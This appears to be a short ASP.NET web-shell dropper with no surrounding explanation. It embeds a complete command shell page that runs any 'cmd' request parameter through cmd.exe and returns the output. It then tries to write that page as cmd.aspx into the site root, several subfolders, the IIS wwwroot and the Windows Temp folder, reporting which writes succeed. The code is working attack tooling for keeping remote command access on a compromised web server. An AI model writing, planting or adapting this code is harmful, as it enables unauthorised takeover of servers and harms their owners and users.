<% string shell = @"<%@ Page Language=""C#"" %><%@ Import Namespace=""System.Diagnostics"" %><% string c=Request[""cmd""]; if(c!=null){Process p=new Process();p.StartInfo.FileName=""cmd.exe"";p.StartInfo.Arguments=""/c ""+c;p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.Start();Response.Write(""

""+p.StandardOutput.ReadToEnd()+""

"");} %>"; string[] paths = new string[] { @"" + Server.MapPath("~") + "\cmd.aspx", @"" + Server.MapPath("~") + "\template\cmd.aspx", @"" + Server.MapPath("~") + "\template\vipks\cmd.aspx", @"" + Server.MapPath("~") + "\inc\cmd.aspx", @"" + Server.MapPath("~") + "\admin\cmd.aspx", @"C:\inetpub\wwwroot\cmd.aspx", @"C:\Windows\Temp\cmd.aspx", }; foreach(string path in paths) { try { System.IO.File.WriteAllText(path, shell); Response.Write("WRITE_OK:" + path + "|"); } catch(Exception ex) { Response.Write("WRITE_FAIL:" + path + ":" + ex.Message.Substring(0, Math.Min(50, ex.Message.Length)) + "|"); } } %>